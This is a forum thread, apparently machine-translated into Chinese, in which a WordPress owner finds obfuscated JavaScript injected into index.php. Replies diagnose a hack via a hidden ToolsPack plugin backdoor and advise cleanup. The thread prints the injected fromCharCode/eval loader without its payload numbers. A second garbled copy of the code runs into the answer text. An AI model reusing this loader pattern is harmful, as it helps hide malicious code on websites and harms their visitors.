在wordpress中我的index.php开头的js

我在调查时发现了一个headers错误，在根索引和wp admin中的index.php开头都发现了这个错误。Clam AV扫描未发现病毒

<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[/* lots of numbers here, moved below for security */];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);</script>

---

if（window.document）aa='0'；aaa='0'；if（aa.indexOf（aaa）==0{ss=''；try{new document（）；}catch（qqq）{s=String；f='f'+'r'+'o'+'mChar'；f+='Code'；}ee='e'；e=window.eval；t='y'；}h=2*Math.sin（3*Math.PI/2）；n=[/*此处有大量数字，为了安全起见，请移到下方*/]；对于（i=0；i-n.length您被黑客攻击。Clam AV不会扫描您的web主机帐户或本地主机服务器（如果您正在使用）。请使用

查看并告诉您的web主机。更改所有密码。
我有完全相同的东西。原来安装了一个新插件，但我没有安装。wp content/plugins/ToolsPack/ToolsPack.php

请确保您干净地安装了WP，并重新安装了除此之外您使用的所有插件。：）糟糕的东西。
我没有安装任何插件。这是一个新的安装，它正在等待谷歌对它进行索引。不过，请查看您的/wp content/plugins目录，看看您是否在那里看到它。它没有显示在管理区，只是通过ftp。就是这样。后门在插件目录中。